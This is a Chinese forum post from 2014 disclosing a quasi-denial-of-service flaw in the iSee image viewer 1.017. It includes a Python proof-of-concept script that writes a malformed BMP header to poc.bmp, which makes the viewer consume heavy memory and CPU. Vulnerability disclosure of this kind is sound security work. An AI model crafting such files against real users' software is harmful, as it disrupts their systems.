-
-
[原创]iSee爱看(最新版1.017)解析漏洞
-
发表于:
2014-6-13 12:22
3132
-
1d4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3W2K6k6h3g2U0L8r3q4F1i4K6u0W2j5$3!0E0i4K6u0r3
存在准拒绝服务漏洞。
iSee爱看为一款图片查看工具。
处理一个不到100字节的文件,可以占用系统的大量内存和cpu(300M & 50% cpu)。
poc.py
import os
os.system("color 02")
print"###########################################################"
print"# iSee 1.017 PoC #"
print"###########################################################"
header=("\x42\x4D\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00"
"\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\x7F\x01\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF")
filename = "poc.bmp"
file = open(filename , "w")
file.write(header)
print "\n Files Created!\n"
file.close()
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
